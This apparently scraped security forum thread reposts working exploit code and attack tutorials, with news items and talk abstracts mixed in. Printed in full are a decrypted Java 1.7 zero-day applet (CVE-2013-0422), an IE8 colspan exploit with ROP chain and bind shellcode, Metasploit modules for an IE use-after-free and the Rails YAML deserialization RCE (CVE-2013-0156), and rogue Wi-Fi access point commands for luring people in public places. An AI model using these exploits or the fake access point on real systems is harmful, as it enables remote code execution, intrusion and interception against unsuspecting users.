Nytro

Detalii: New year, new Java zeroday! - AlienVault Labs Malware don't need Coffee: 0 day (CVE-2013-0422) 1.7u10 spotted in the Wild - Disable Java Plugin NOW ! http://pastebin.com/raw.php?i=cUG2ayjh Exploit Packs updated with New Java Zero-Day vulnerability - Hacking News /* Java 0day 1.7.0_10 decrypted source Originaly placed on https://damagelab.org/index.php?showtopic=23719&st=0 From Russia with love. */ import java.applet.Applet; import com.sun.jmx.mbeanserver.JmxMBeanServer; import com.sun.jmx.mbeanserver.JmxMBeanServerBuilder; import com.sun.jmx.mbeanserver.MBeanInstantiator; import java.lang.invoke.MethodHandle; import java.lang.invoke.MethodHandles; import java.lang.invoke.MethodType; import java.lang.reflect.Method; public byte[] hex2Byte(String paramString) { byte[] arrayOfByte = new byte[paramString.length() / 2]; for (int i = 0; i < arrayOfByte.length; i++) { arrayOfByte[i] = (byte)Integer.parseInt(paramString.substring(2 * i, 2 * i + 2), 16); } return arrayOfByte; } public static String ByteArrayWithSecOff = & #34;CAFEBABE0000003200270A000500180A0019001A07001B0A001C001D07001E07001F07002001 00063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C6501 00124C6F63616C5661726961626C655461626C65010001650100154C6A6176612F6C616E672F4578 63657074696F6E3B010004746869730100034C423B01000D537461636B4D61705461626C6507001F 07001B01000372756E01001428294C6A6176612F6C616E672F4F626A6563743B01000A536F757263 6546696C65010006422E6A6176610C000800090700210C002200230100136A6176612F6C616E672F 457863657074696F6E0700240C002500260100106A6176612F6C616E672F4F626A65637401000142 0100276A6176612F73656375726974792F50726976696C65676564457863657074696F6E41637469 6F6E01001E6A6176612F73656375726974792F416363657373436F6E74726F6C6C657201000C646F 50726976696C6567656401003D284C6A6176612F73656375726974792F50726976696C6567656445 7863657074696F6E416374696F6E3B294C6A6176612F6C616E672F4F626A6563743B0100106A6176 612F6C616E672F53797374656D01001273657453656375726974794D616E6167657201001E284C6A 6176612F6C616E672F53656375726974794D616E616765723B295600210006000500010007000000 020001000800090001000A0000006C000100020000000E2AB700012AB8000257A700044CB1000100 040009000C00030003000B000000120004000000080004000B0009000C000D000D000C0000001600 02000D0000000D000E00010000000E000F001000000011000000100002FF000C0001070012000107 0013000001001400150001000A0000003A000200010000000C01B80004BB000559B70001B0000000 02000B0000000A00020000001000040011000C0000000C00010000000C000F001000000001001600 0000020017"; public void init() { try { byte[] arrayOfByte = hex2Byte(ByteArrayWithSecOff); JmxMBeanServerBuilder localJmxMBeanServerBuilder = new JmxMBeanServerBuilder(); JmxMBeanServer localJmxMBeanServer = (JmxMBeanServer)localJmxMBeanServerBuilder.newMBeanServer("", null, null); MBeanInstantiator localMBeanInstantiator = localJmxMBeanServer.getMBeanInstantiator(); ClassLoader a = null; Class localClass1 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.Context", a); Class localClass2 = localMBeanInstantiator.findClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader", a); MethodHandles.Lookup localLookup = MethodHandles.publicLookup(); MethodType localMethodType1 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { MethodType.class }); MethodHandle localMethodHandle1 = localLookup.findVirtual(MethodHandles.Lookup.class, "findConstructor", localMethodType1); MethodType localMethodType2 = MethodType.methodType(Void.TYPE); MethodHandle localMethodHandle2 = (MethodHandle)localMethodHandle1.invokeWithArguments(new Object[] { localLookup, localClass1, localMethodType2 }); Object localObject1 = localMethodHandle2.invokeWithArguments(new Object[0]); MethodType localMethodType3 = MethodType.methodType(MethodHandle.class, Class.class, new Class[] { String.class, MethodType.class }); MethodHandle localMethodHandle3 = localLookup.findVirtual(MethodHandles.Lookup.class, "findVirtual", localMethodType3); MethodType localMethodType4 = MethodType.methodType(localClass2, ClassLoader.class); MethodHandle localMethodHandle4 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass1, "createClassLoader", localMethodType4 }); Object localObject2 = localMethodHandle4.invokeWithArguments(new Object[] { localObject1, null }); MethodType localMethodType5 = MethodType.methodType(Class.class, String.class, new Class[] { byte[].class }); MethodHandle localMethodHandle5 = (MethodHandle)localMethodHandle3.invokeWithArguments(new Object[] { localLookup, localClass2,"defineClass", localMethodType5 }); Class localClass3 = (Class)localMethodHandle5.invokeWithArguments(new Object[] { localObject2, null, arrayOfByte }); localClass3.newInstance(); Runtime.getRuntime().exec("calc.exe"); } catch (Throwable ex) {} } }

Detalii: https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156 https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-with-metasploit-cve-2013-0156 Ronin - Rails PoC exploits for CVE-2013-0156 and CVE-2013-0155

PS: Author: sickness

[h=1]Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass[/h] <!-- ** Exploit Title: Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass ** Author: sickness@offsec.com ** Thanks to Ryujin and Dookie for their help. #################################################################### ** Affected Software: Internet Explorer 8 ** Vulnerability: Fixed Col Span ID ** CVE: CVE-2012-1876 ** Metasploit exploit using NON-ASLR DLL: http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser/ms12_037_ie_colspan.rb ** Vupen Blog post: http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php ** Tested on Windows 7 (x86) - IE 8.0.7601.17514 #################################################################### ** The exploit bypasses ASLR without the need of any NON-ASLR dll's using a leak ** To get it working on a different version of Windows you will require to make your own chances to the exploit ** Have fun --> <html> <body> <div id="evil"></div> <table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table> <script language='javascript'> function strtoint(str) { return str.charCodeAt(1)*0x10000 + str.charCodeAt(0); } var free = "EEEE"; while ( free.length < 500 ) free += free; var string1 = "AAAA"; while ( string1.length < 500 ) string1 += string1; var string2 = "BBBB"; while ( string2.length < 500 ) string2 += string2; var fr = new Array(); var al = new Array(); var bl = new Array(); var div_container = document.getElementById("evil"); div_container.style.cssText = "display:none"; for (var i=0; i < 500; i+=2) { fr[i] = free.substring(0, (0x100-6)/2); al[i] = string1.substring(0, (0x100-6)/2); bl[i] = string2.substring(0, (0x100-6)/2); var obj = document.createElement("button"); div_container.appendChild(obj); } for (var i=200; i<500; i+=2 ) { fr[i] = null; CollectGarbage(); } function heapspray(cbuttonlayout) { CollectGarbage(); var rop = cbuttonlayout + 4161; // RET var rop = rop.toString(16); var rop1 = rop.substring(4,8); var rop2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 11360; // POP EBP var rop = rop.toString(16); var rop3 = rop.substring(4,8); var rop4 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 111675; // XCHG EAX,ESP var rop = rop.toString(16); var rop5 = rop.substring(4,8); var rop6 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12377; // POP EBX var rop = rop.toString(16); var rop7 = rop.substring(4,8); var rop8 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 642768; // POP EDX var rop = rop.toString(16); var rop9 = rop.substring(4,8); var rop10 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12201; // POP ECX --> Changed var rop = rop.toString(16); var rop11 = rop.substring(4,8); var rop12 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 5504544; // Writable location var rop = rop.toString(16); var writable1 = rop.substring(4,8); var writable2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12462; // POP EDI var rop = rop.toString(16); var rop13 = rop.substring(4,8); var rop14 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12043; // POP ESI --> changed var rop = rop.toString(16); var rop15 = rop.substring(4,8); var rop16 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 63776; // JMP EAX var rop = rop.toString(16); var jmpeax1 = rop.substring(4,8); var jmpeax2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 85751; // POP EAX var rop = rop.toString(16); var rop17 = rop.substring(4,8); var rop18 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 4936; // VirtualProtect() var rop = rop.toString(16); var vp1 = rop.substring(4,8); var vp2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX] var rop = rop.toString(16); var rop19 = rop.substring(4,8); var rop20 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 234657; // PUSHAD var rop = rop.toString(16); var rop21 = rop.substring(4,8); var rop22 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 408958; // PUSH ESP var rop = rop.toString(16); var rop23 = rop.substring(4,8); var rop24 = rop.substring(0,4); // } RET var shellcode = unescape("%u"+rop1+"%u"+rop2); // RET shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP shellcode+= unescape("%u1024%u0000"); // Size 0x00001024 shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX shellcode+= unescape("%u0040%u0000"); // 0x00000040 shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2); // JMP EAX shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect() shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX] shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP shellcode+= unescape("%u9090%u9090"); // crap shellcode+= unescape("%u9090%u9090"); // crap // Bind shellcode on 4444 shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" + "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" + "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" + "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" + "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" + "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" + "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" + "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" + "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" + "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" + "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" + "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" + "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" + "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" + "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" + "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" + "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" + "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" + "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" + "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" + "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" + "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" + "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" + "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" + "%u006a%uff53%u41d5"); while (shellcode.length < 100000) shellcode = shellcode + shellcode; var onemeg = shellcode.substr(0, 64*1024/2); for (i=0; i<14; i++) { onemeg += shellcode.substr(0, 64*1024/2); } onemeg += shellcode.substr(0, (64*1024/2)-(38/2)); var spray = new Array(); for (i=0; i<100; i++) { spray[i] = onemeg.substr(0, onemeg.length); } } function leak(){ var leak_col = document.getElementById("132"); leak_col.width = "41"; leak_col.span = "19"; } function get_leak() { var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13)); str_addr = str_addr - 1410704; setTimeout(function(){heapspray(str_addr)}, 200); } function trigger_overflow(){ var evil_col = document.getElementById("132"); evil_col.width = "1178993"; evil_col.span = "44"; } setTimeout(function(){leak()}, 300); setTimeout(function(){get_leak()},700); //setTimeout(function(){heapspray()}, 900); setTimeout(function(){trigger_overflow()}, 1200); </script> </body> </html> Sursa: Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass

[h=1]Microsoft Internet Explorer Option Element Use-After-Free[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::RopDb def initialize(info={}) super(update_info(info, 'Name' => "Microsoft Internet Explorer Option Element Use-After-Free", 'Description' => %q{ This module exploits a vulnerability in Microsoft Internet Explorer. A memory corruption may occur when the Option cache isn't updated properly, which allows other JavaScript methods to access a deleted Option element, and results in code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ivan Fratric', #Initial discovery 'juan vazquez', #Metasploit 'sinn3r' #Metasploit ], 'References' => [ [ 'CVE', '2011-1996' ], [ 'MSB', 'MS11-081' ], [ 'URL', 'http://ifsec.blogspot.com/2011/10/internet-explorer-option-element-remote.html' ], [ 'URL', 'http://pastebin.com/YLH725Aj' ] ], 'Payload' => { 'StackAdjustment' => -3500, }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ [ 'Automatic', {} ], [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => 0x4f8, 'OffsetVirtualFunc' => 502 } ], [ 'IE 8 on Windows Vista', { 'Rop' => :jre, 'Offset' => 0x4f8, 'OffsetVirtualFunc' => 502 } ], [ 'IE 8 on Windows 7', { 'Rop' => :jre, 'Offset' => 0x4f8, 'OffsetVirtualFunc' => 502 } ] ], 'Privileged' => false, 'DisclosureDate' => "Oct 11 2012", 'DefaultTarget' => 0)) register_options( [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false]) ], self.class) end def get_target(agent) #If the user is already specified by the user, we'll just use that return target if target.name != 'Automatic' nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || '' ie = agent.scan(/MSIE (\d)/).flatten[0] || '' ie_name = "IE #{ie}" case nt when '5.1' os_name = 'Windows XP SP3' when '6.0' os_name = 'Windows Vista' when '6.1' os_name = 'Windows 7' end targets.each do |t| if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name)) print_status("Target selected as: #{t.name}") return t end end return nil end def ie_heap_spray(my_target, p) js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch)) js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch)) js = %Q| function heap_spray() { var heap_obj = new heapLib.ie(0x20000); var code = unescape("#{js_code}"); var nops = unescape("#{js_nops}"); while (nops.length < 0x80000) nops += nops; var offset = nops.substring(0, #{my_target['Offset']}); var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); while (shellcode.length < 0x40000) shellcode += shellcode; var block = shellcode.substring(0, (0x80000-6)/2); heap_obj.gc(); for (var i=1; i < 0x300; i++) { heap_obj.alloc(block); } var overflow = nops.substring(0, 10); } | js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate @heap_spray_func = js.sym("heap_spray") end return js end def get_payload(t, cli) code = payload.encoded # No rop. Just return the payload. return code if t['Rop'].nil? # Both ROP chains generated by mona.py - See corelan.be case t['Rop'] when :msvcrt print_status("Using msvcrt ROP") rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'}) rop_payload << make_nops(t['OffsetVirtualFunc']-rop_payload.length) rop_payload << "\xeb\x04" # jmp $+6 rop_payload << [0x77c15ed5].pack("V") # 0x0c0c0c0 # stackpivot => xchg eax, esp # ret rop_payload << code else print_status("Using JRE ROP") rop_payload = generate_rop_payload('java', '') rop_payload << make_nops(t['OffsetVirtualFunc']-rop_payload.length) rop_payload << "\xeb\x08" # jmp $+10 rop_payload << [0x7c348b05].pack("V") # stackpivot => xchg eax, esp # ret rop_payload << [0x7c348b05].pack("V") # stackpivot => xchg eax, esp # ret rop_payload << code end return rop_payload end def load_exploit_html(my_target, cli) @heap_spray_func = "heap_spray" p = get_payload(my_target, cli) js = ie_heap_spray(my_target, p) #var fakeobj = unescape("%u0c0c%u0c0c"); #call to 0c0c0c0c #eax ==> 0c0c0a14 html = %Q| <!DOCTYPE html> <html> <head> <script> #{js} function ivan() { var fakeobj = unescape("%u0a14%u0c0c"); fakeobj += unescape("%u4141%u4141"); while (fakeobj.length <= 0x38/2) fakeobj += unescape("%u4141%u4141"); var formobj, selobj, optobj; selobj = document.getElementById("select1"); formobj = selobj.form; var imgarray = new Array(); for(var j = 0; j < 500; j++) { imgarray.push(document.createElement("img")); } for(var i=0;i<5;i++) { optobj = document.createElement('option'); optobj.text = "test"; selobj.add(optobj); } selobj.innerText = "foo"; for(var i = 0; i < imgarray.length; i++) { imgarray[i].title = fakeobj.substring(0, 0x38 / 2 - 1); } #{@heap_spray_func}(); formobj.reset(); } </script> </head> <body onload='ivan()'> <form method="post"> <select id="select1"> </select> </form> </body> </html> | return html end def on_request_uri(cli, request) agent = request.headers['User-Agent'] uri = request.uri print_status("Requesting: #{uri}") my_target = get_target(agent) # Avoid the attack if no suitable target found if my_target.nil? print_error("Browser not supported, sending 404: #{agent}") send_not_found(cli) return end html = load_exploit_html(my_target, cli) html = html.gsub(/^\t\t/, '') print_status("Sending HTML...") send_response(cli, html, {'Content-Type'=>'text/html'}) end end Sursa: Microsoft Internet Explorer Option Element Use-After-Free

[h=1]Ruby on Rails XML Processor YAML Deserialization Code Execution[/h] ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Ruby on Rails XML Processor YAML Deserialization Code Execution', 'Description' => %q{ This module exploits a remote code execution vulnerability in the XML request processor of the Ruby on Rails application framework. This vulnerability allows an attacker to instantiate a remote object, which in turn can be used to execute any ruby code remotely in the context of the application. This module has been tested across multiple versions of RoR 3.x and RoR 2.x }, 'Author' => [ 'charlisome', # PoC 'espes', # PoC and Metasploit module 'lian', # Identified the RouteSet::NamedRouteCollection vector 'hdm' # Module merge/conversion/payload work ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2013-0156'], ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-0156'] ], 'Platform' => 'ruby', 'Arch' => ARCH_RUBY, 'Privileged' => false, 'Targets' => [ ['Automatic', {} ] ], 'DisclosureDate' => 'Jan 7 2013', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(80), OptString.new('URIPATH', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]), OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"]) ], self.class) register_evasion_options( [ OptBool.new('XML::PadElement', [ true, 'Pad the exploit request with randomly generated XML elements', true]) ], self.class) end # # This stub ensures that the payload runs outside of the Rails process # Otherwise, the session can be killed on timeout # def detached_payload_stub(code) %Q^ code = '#{ Rex::Text.encode_base64(code) }'.unpack("m0").first if RUBY_PLATFORM =~ /mswin|mingw|win32/ inp = IO.popen("ruby", "wb") rescue nil if inp inp.write(code) inp.close end else if ! Process.fork() eval(code) rescue nil end end ^.strip.split(/\n/).map{|line| line.strip}.join("\n") end # # Create the YAML document that will be embedded into the XML # def build_yaml_rails2 # Embed the payload with the detached stub code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) ) yaml = "--- !ruby/hash:ActionController::Routing::RouteSet::NamedRouteCollection\n" + "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " + "eval(%[#{code}].unpack(%[m0])[0]);' " + ": !ruby/object:ActionController::Routing::Route\n segments: []\n requirements:\n " + ":#{Rex::Text.rand_text_alpha(rand(8)+1)}:\n :#{Rex::Text.rand_text_alpha(rand(8)+1)}: " + ":#{Rex::Text.rand_text_alpha(rand(8)+1)}\n" yaml end # # Create the YAML document that will be embedded into the XML # def build_yaml_rails3 # Embed the payload with the detached stub code = Rex::Text.encode_base64( detached_payload_stub(payload.encoded) ) yaml = "--- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection\n" + "'#{Rex::Text.rand_text_alpha(rand(8)+1)}; " + "eval(%[#{code}].unpack(%[m0])[0]);' " + ": !ruby/object:OpenStruct\n table:\n :defaults: {}\n" yaml end # # Create the XML wrapper with any desired evasion # def build_request(v) xml = '' elo = Rex::Text.rand_text_alpha(rand(12)+4) if datastore['XML::PadElement'] xml << "<#{elo}>" 1.upto(rand(1000)+50) do el = Rex::Text.rand_text_alpha(rand(12)+4) tp = ['string', 'integer'][ rand(2) ] xml << "<#{el} type='#{tp}'>" xml << ( tp == "integer" ? Rex::Text.rand_text_numeric(rand(8)+1) : Rex::Text.rand_text_alphanumeric(rand(8)+1) ) xml << "</#{el}>" end end el = Rex::Text.rand_text_alpha(rand(12)+4) xml << "<#{el} type='yaml'>" xml << (v == 2 ? build_yaml_rails2 : build_yaml_rails3) xml << "</#{el}>" if datastore['XML::PadElement'] 1.upto(rand(1000)+50) do el = Rex::Text.rand_text_alpha(rand(12)+4) tp = ['string', 'integer'][ rand(2) ] xml << "<#{el} type='#{tp}'>" xml << ( tp == "integer" ? Rex::Text.rand_text_numeric(rand(8)+1) : Rex::Text.rand_text_alphanumeric(rand(8)+1) ) xml << "</#{el}>" end xml << "</#{elo}>" end xml end # # Send the actual request # def exploit print_status("Sending Railsv3 request to #{rhost}:#{rport}...") res = send_request_cgi({ 'uri' => datastore['URIPATH'] || "/", 'method' => datastore['HTTP_METHOD'], 'ctype' => 'application/xml', 'data' => build_request(3) }, 25) handler print_status("Sending Railsv2 request to #{rhost}:#{rport}...") res = send_request_cgi({ 'uri' => datastore['URIPATH'] || "/", 'method' => datastore['HTTP_METHOD'], 'ctype' => 'application/xml', 'data' => build_request(2) }, 25) handler end end Sursa: Ruby on Rails XML Processor YAML Deserialization Code Execution

[h=1]Expert Finds Java 1.7 Zero-Day on High-Profile Website[/h] January 10th, 2013, 14:29 GMT · By Eduard Kovacs The security expert known as Kafeine, the curator of the Malware Don’t Need Coffee website, has come across a new Java zero-day. The vulnerability affects the latest Java 1.7 and it has been found on a website that allegedly records hundreds of thousands of hits each day. Experts from AlienVault have analyzed the exploit and they've shown that a malicious Java applet can be used to execute code (in their example, the Calculator application from Windows). “The Java file is highly obfuscated but based on the quick analysis we did the exploit is probably bypassing certain security checks tricking the permissions of certain Java classes as we saw in CVE-2012-4681,” AlienVault’s Jaime Blasco explained. Researchers from Bitdefender are also analyzing the zero-day which, they say, has been integrated into the recently developed Cool exploit kit. While more details of the vulnerability come to light, experts advise users to disable Java and avoid clicking on suspicious links. Sursa: Expert Finds Java 1.7 Zero-Day on High-Profile Website - Softpedia

[h=1]REPT Reverse Engineering[/h]The whole tutorial is about playing with a target and implementing new things into it. The article is not for newbies, you must know how the tools given in this tutorial works. Tutoriale: http://199.201.127.158/index.php?dir=RCE%20Tutorials/REPT%20Reverse%20Engineering%20Techniques/ Via: REPT Reverse Engineering Technqiues No. 1 - rohitab.com - Forums

INTRODUCTION TO ARM LINUX EXPLOITING Metin KAYA kayameti@gmail.com 2013.01.09, 15:30, Istanbul Metin KAYA - Official Web Site [EnderUNIX] http://www.twitter.com/_metinkaya This paper is the Linux version of the document http://www.signalsec.com/publications/arm_exploiting.pdf which mentions exploiting ARM on Windows systems. Thanks Celil ÜNÜVER for inspiring me. The ARM architecture is used in crucial positions; e.g., mobile phones, femtocells, smallcells, SCADA systems, POS machines. Basic knowledge on ARM, GDB, GCC, C, assembly, Python, and some bash commands is necessary to understand what is going on in the document. The host machine is x86 Linux (32 bit 3.5.0 kernel), so an ARM cross compiler [1] is required for target machine which is ARMv7 little-endian Linux (32 bit 2.6.34 kernel). Download: http://packetstorm.foofus.com/papers/general/exploit_arm_linux_en.pdf

Create Wireless Rogue Access Point Description: In this video I will show you how to create a fake Access point. What is the purpose to create this Fake Access Point ? Lets see if you are in a public place you have all wifi attack gadgets, and you setup a fake access point in the public places AP name called “FreeNetOnlyForToday” maybe people will try to connect this AP - Now what can you do ? You can fire a Metasploit on it because all connections belong to you and tons of stuff you can perform. In the next video I will cover how to create a fake AP and get Passwords. Steps : - apt-get install dhcp3-server airmon-ng start wlan0 airbase-ng -e FreeNet -c 11 -v wlan0 ifconfig at0 up ifconfig at0 11.0.0.254 netmask 255.255.255.0 route add -net 11.0.0.0 netmask 255.255.255.0 gw 11.0.0.254 ---- Add Config in dhcp3 ---- Path = /etc/dhcp3/dhcpd.conf ---- Paste it this ----- ddns-update-style ad-hoc; default-lease-time 600; max-lease-time 7200; authoritative; subnet 10.0.0.0 netmask 255.255.255.0 { option subnet-mask 255.255.255.0; option broadcast-address 10.0.0.255; option routers 10.0.0.254; option domain-name-servers 8.8.8.8; range 10.0.0.1 10.0.0.140; } iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o eth3 -j MASQUERADE echo > '/var/lib/dhcp3/dhcpd.leases' ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 echo "1" > /proc/sys/net/ipv4/ip_forward If you feel boring to type all these commands no problem ? Use this Bash Script. This bash script will automate your whole process. But check all the connection in bash script or you will get an error. Source : - exploit.co.il #!/bin/bash echo "Killing Airbase-ng..." pkill airbase-ng sleep 2; echo "Killing DHCP..." pkill dhcpd3 sleep 5; echo "Putting Wlan In Monitor Mode..." airmon-ng stop wlan0 # Change to your wlan interface sleep 5; airmon-ng start wlan0 # Change to your wlan interface sleep 5; echo "Starting Fake AP..." airbase-ng -e FreeNet -c 11 -v mon0 & # Change essid, channel and interface sleep 5; ifconfig at0 up ifconfig at0 10.0.0.254 netmask 255.255.255.0 # Change IP addresses as configured in your dhcpddhcpd.conf route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.254 sleep 5; iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE # Change eth0 to your internet facing interface echo > '/var/lib/dhcp3/dhcpd.leases' ln -s /var/run/dhcp3-server/dhcpd.pid /var/run/dhcpd.pid dhcpd3 -d -f -cf /etc/dhcp3/dhcpd.conf at0 & sleep 5; echo "1" > /proc/sys/net/ipv4/ip_forward Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Create Wireless Rogue Access Point

Iran's Real Life Cyberwar Description: Abstract The recent Stuxnet, Flame and CA compromises involving Comodo and DigiNotar had three common elements, each was government sponsored, each involved Iran and all three involved a PKI compromise. The presenter will share experience of dealing with the Iranian attack, highlighting the ways in which government sponsored attacks are very different from both 'ordinary' criminal attacks and the Hollywood view of 'cyberwarfare'. ***** Speaker: Phillip Hallam-Baker, Vice President and Principal Scientist, Comodo Inc. Dr Hallam-Baker is an internationally recognized computer security specialist credited with 'significant contributions' to the design of HTTP 1.0, the core protocol of the World Wide Web. His book 'dotCrime Manifesto: How to Stop Internet Crime' sets out the first technical blueprint for how to make the Web and the Internet a less crime permissive environment by introducing accountability controls for transactions that require them. Hallam-Baker has made significant contributions to core Internet security protocols, including XKMS, SAML, WS-Security, WS-Trust and KEYPROV. He has participated in standards groups in IETF, W3C and OASIS and played a key role in establishing the concept of Extended Validation certificates as an Industry standard. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Iran's Real Life Cyberwar - Phillip Hallam-Baker on Vimeo Sursa: Iran's Real Life Cyberwar

Sql Server Exploitation, Escalation And Pilfering Description: Abstract During this presentation attendees will be introduced to lesser known, yet significant vulnerabilities in SQL Server implementations related to common trust relationships, misconfigurations, and weak default settings. The issues that will be covered are often leveraged by attackers to gain unauthorized access to high value systems, applications, and sensitive data. An overview of each issue, common vectors of attack, and manual techniques will be covered. Finally newly created Metasploit modules and TSQL scripts will be demonstrated that help automate the attacks. This presentation will be valuable to penetration testers who are looking for faster ways to gain access to critical data and systems. Additionally, it should be worth while for developers and database administrators who are interested in gaining a better understanding of how to protect their applications and databases from these attacks. ***** Speakers Antti Rantasaari, Security Consultant, NetSPI Antti Rantasaari is currently a security consultant at NetSPI. He is responsible for performing security assessments and contributing to the development of the methodologies, techniques, and tools used during network and application penetration testing. Scott Sutherland, NetSPI Scott Sutherland is a Principal Security Consultant at NetSPI. Scott is responsible for the development and execution of penetration testing for the firm. He has developed a number of the proprietary tools and techniques that the company uses and also plays a 